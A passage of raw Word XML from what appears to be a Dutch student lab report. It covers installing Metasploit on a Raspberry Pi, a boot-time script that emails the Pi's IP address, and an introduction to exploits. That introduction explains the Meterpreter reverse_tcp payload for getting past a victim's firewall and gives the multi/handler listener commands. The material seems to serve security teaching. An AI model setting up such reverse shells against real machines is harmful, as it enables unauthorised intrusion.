      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bison</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>postgresql-contrib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>libpq-dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> libapr1 libaprutil1 libsvn1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>libpcap-dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRPr="00047FB4" w:rsidRDefault="00E75755" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install libsqlite3-dev   apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-core </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl ruby1.9.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gem   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRDefault="00E75755" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">gem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>wirble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlite3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bundler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRPr="00E75755" w:rsidRDefault="00E75755" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRPr="00047FB4" w:rsidRDefault="00E75755" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> clone https://github.com/rapid7/metasploit-framework.git   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRPr="00E75755" w:rsidRDefault="00E75755" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>metasploit-framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRDefault="00E75755" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bundle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F80FAE" w:rsidRDefault="00F80FAE" w:rsidP="00E75755">
      <w:r>
        <w:t xml:space="preserve">hierna kunnen we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> starten met dit commando:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F80FAE" w:rsidRDefault="00F80FAE" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00664499" w:rsidRDefault="00664499" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00664499" w:rsidRDefault="00664499" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00664499" w:rsidRDefault="00664499" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00664499" w:rsidRDefault="00664499" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00664499" w:rsidRDefault="00664499" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="006104E6">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE2CD3" w:rsidRDefault="00EE2CD3" w:rsidP="006104E6">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc440110967"/>
    </w:p>
    <w:p w:rsidR="00DD5060" w:rsidRDefault="006104E6" w:rsidP="006104E6">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mailerscript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006104E6" w:rsidRPr="006104E6" w:rsidRDefault="006104E6" w:rsidP="006104E6"/>
    <w:p w:rsidR="00DD5060" w:rsidRDefault="00CC6792" w:rsidP="00E75755">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00DD5060">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD5060">
        <w:t>rpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD5060">
        <w:t xml:space="preserve"> moet toegankelijk zijn met een remote shell, om dit te kunnen doen moeten we telkens een scherm aansluiten op de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD5060">
        <w:t>rpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD5060">
        <w:t xml:space="preserve"> om het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD5060">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD5060">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD5060">
        <w:t>adress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD5060">
        <w:t xml:space="preserve"> op te zoeken. Wij hebben op aanraden van de lector gebruik gemaakt van een python script dat gestart word bij het opstarten van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD5060">
        <w:t>rpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD5060">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dit script zal automatisch het IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> naar een email </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sturen zodat er gemakkelijk en snel via SSH verbinding kan gemaakt worden.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC6792" w:rsidRDefault="00CC6792" w:rsidP="00E75755">
      <w:r>
        <w:t xml:space="preserve">Hoe hebben we dit gedaan ? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC6792" w:rsidRDefault="00CC6792" w:rsidP="00E75755">
      <w:r>
        <w:t xml:space="preserve">1.Script </w:t>
      </w:r>
      <w:r w:rsidR="00661CA5">
        <w:t>in teksteditor plakken en opslagen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> als </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC6792">
        <w:t>startup_mailer.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D73E7" w:rsidRDefault="006104E6" w:rsidP="00E75755">
      <w:r w:rsidRPr="006104E6"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 wp14:anchorId="44991286" wp14:editId="3F686CD5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4391025" cy="4158615"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="11" name="Afbeelding 11" descr="C:\Users\nick\Downloads\12483772_10208531981325387_6463579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\Downloads\12483772_10208531981325387_646357941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04E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="006104E6" w:rsidRDefault="006104E6" w:rsidP="00CC6792"/>
    <w:p w:rsidR="00CC6792" w:rsidRDefault="00CC6792" w:rsidP="00CC6792">
      <w:r>
        <w:t xml:space="preserve">2. maak het script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> met deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6792">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6792">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6792">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6792">
        <w:t xml:space="preserve"> +x startup_mailer.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC6792" w:rsidRDefault="001D73E7" w:rsidP="00CC6792">
      <w:r>
        <w:t xml:space="preserve">3. open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rc.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC6792">
        <w:t xml:space="preserve"> in een teksteditor (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  <w:r w:rsidR="00CC6792">
        <w:t>) en voe</w:t>
      </w:r>
      <w:r>
        <w:t>g het volgende toe aan het</w:t>
      </w:r>
      <w:r w:rsidR="00CC6792">
        <w:t xml:space="preserve"> bestand : </w:t>
      </w:r>
      <w:r w:rsidR="00CC6792" w:rsidRPr="00CC6792">
        <w:t>python /home/pi/Code/startup_mailer.py</w:t>
      </w:r>
      <w:r w:rsidR="00CC6792">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> moet onder : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “My IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is %s\n” “$_IP”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2CD3" w:rsidRDefault="00CC6792" w:rsidP="00EE2CD3">
      <w:r>
        <w:t xml:space="preserve">Dit zal er voor zorgen dat het script word </w:t>
      </w:r>
      <w:r w:rsidR="001D73E7">
        <w:t>uitgevoerd bij het opstarten.</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Toc440110968"/>
    </w:p>
    <w:p w:rsidR="00EE2CD3" w:rsidRDefault="00EE2CD3" w:rsidP="00EE2CD3">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRDefault="00785CB3" w:rsidP="00EE2CD3">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Exploits</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00120DEA" w:rsidRDefault="00885F6E" w:rsidP="00F80FAE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zijn tools die geschreven worden om gebruik te maken van zwakheden (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00885F6E">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) in programma’s , als zo een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ontdekt word kan d</w:t>
      </w:r>
      <w:r w:rsidR="00603B12">
        <w:t xml:space="preserve">eze gerapporteerd worden aan de eigenaar van de software bv: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00603B12">
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00603B12">
        <w:t xml:space="preserve"> zodat deze zwakheden kunnen versterkt worden door middel van patches. Er zijn ook </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00603B12">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00603B12">
        <w:t xml:space="preserve"> die privé gehouden worden (en dus niet op </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00603B12">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00603B12">
        <w:t xml:space="preserve"> staan) omdat hackers die deze vinden er gebruik van willen maken , deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00603B12">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00603B12">
        <w:t xml:space="preserve"> noemt men zero </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00603B12">
        <w:t>day’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00603B12">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00120DEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE7C0D" w:rsidRDefault="00120DEA" w:rsidP="00F80FAE">
      <w:r>
        <w:t xml:space="preserve">Bij alle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> die we hebben gedaan gebruikten we als </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D45DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dit is de verbinding die we gaan opstellen tussen het slachtoffer en de aanvaller. Waarom ? Omdat de firewall van het slachtoffer alle poorten filtert/blokkeert , dus is het onmogelijk om een gewone </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> connectie te maken. Hoewel het slachtoffer zijn computer het wel toelaat om een connectie te STARTEN met remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE2CD3">
        <w:t>(geen uitgaande data filtering</w:t>
      </w:r>
      <w:r w:rsidR="002F1526">
        <w:t xml:space="preserve"> vandaar REVERSE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F1526">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EE2CD3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nu met deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zal de slachtoffer computer een connectie proberen maken met de hacker computer zodanig dat de firewall hier geen problemen mee heeft.</w:t>
      </w:r>
      <w:r w:rsidR="00EE2CD3">
        <w:t xml:space="preserve"> Daarom moeten we een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t xml:space="preserve"> starten op de hacker pc zodat de inkomende </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t xml:space="preserve"> connectie kan gemaakt worden : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>multi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t xml:space="preserve"> =&gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE2CD3">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008616CF" w:rsidRDefault="008616CF" w:rsidP="00F80FAE">
      <w:r>
        <w:t xml:space="preserve">Een normale </w:t>
      </w:r>
